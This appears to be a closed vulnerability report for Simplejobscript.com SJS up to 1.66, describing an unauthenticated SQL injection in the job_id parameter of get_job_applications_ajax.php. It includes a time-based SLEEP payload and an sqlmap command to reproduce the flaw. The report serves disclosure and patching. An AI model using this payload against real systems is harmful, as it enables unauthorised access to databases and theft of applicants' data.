Closed
Description
Description: An issue was discovered in Simplejobscript.com SJS through 1.66. There is an unauthenticated SQL injection via the job applications search function. The vulnerable parameter is job_id. The function is getJobApplicationsByJobId(). The file is _lib/class.JobApplication.php.
Environment:
Version: 1.64
OS: Ubuntu 16.10
Web server: Apache 2.4.18
PHP: 5.6.40
Database: MySQL 5.7.28
URL: /get_job_applications_ajax.php
Payload: job_id=493+AND+(SELECT+9069+FROM+(SELECT(SLEEP(5)))Ufmy)
Steps to Reproduce:
$ sqlmap --batch --threads=10 --dbms=mysql -u "http://local.simplejobscript.net/get_job_applications_ajax.php" --data="job_id=493" --banner
Metadata
Metadata
Assignees
Labels
No labels
